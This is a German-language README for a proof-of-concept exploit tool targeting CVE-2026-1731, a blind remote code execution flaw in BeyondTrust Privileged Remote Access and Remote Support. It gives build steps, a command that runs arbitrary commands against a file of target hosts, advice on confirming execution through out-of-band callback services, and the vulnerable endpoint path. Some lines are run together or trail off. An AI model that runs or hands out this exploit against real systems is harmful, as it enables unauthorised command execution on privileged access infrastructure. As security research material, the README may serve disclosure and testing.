
Proof-of-Concept-Exploit für CVE-2026-1731, eine blinde RCE in BeyondTrust Privileged Remote Access und Remote Support, die die Remote-Befehlsausführung auf verwundbaren Versionen ermöglicht.
Für weitere Informationen empfehle ich, die Analyse von attackerkb.com zu lesen.
Sie benötigen die folgenden Tools, um dieses PoC zu bauen: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731-Binärdatei befindet sich dann in target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
Sie können ./CVE-2026-1731 -h ausführen, um eine Liste der verfügbaren Optionen anzuzeigen.
./CVE-2026-1731 --targets targets.txt --command "whoami"
Hinweis: Da CVE-2026-1731 ein Blind-RCE ist, wird keine Antwort vom Host zurückgesendet, die als Indikator für die Verwundbarkeit verwendet werden kann. Eine Anfrage kann erfolgreich sein, aber ein Ziel, das nicht verwundbar ist, löst kein RCE aus. Es wird empfohlen, einen Dienst wie webhook.site oder PortSwigger's Burp Collaborator für Tests gegen Ziele zu verwenden. Ein Fehlschlag oder Erfolg in diesem PoC basiert darauf, ob der Server mit einem Statuscode 200 antwortet oder nicht.
GET /get_rdf?comp=sdcust&locale_code=en-us hinzufügen.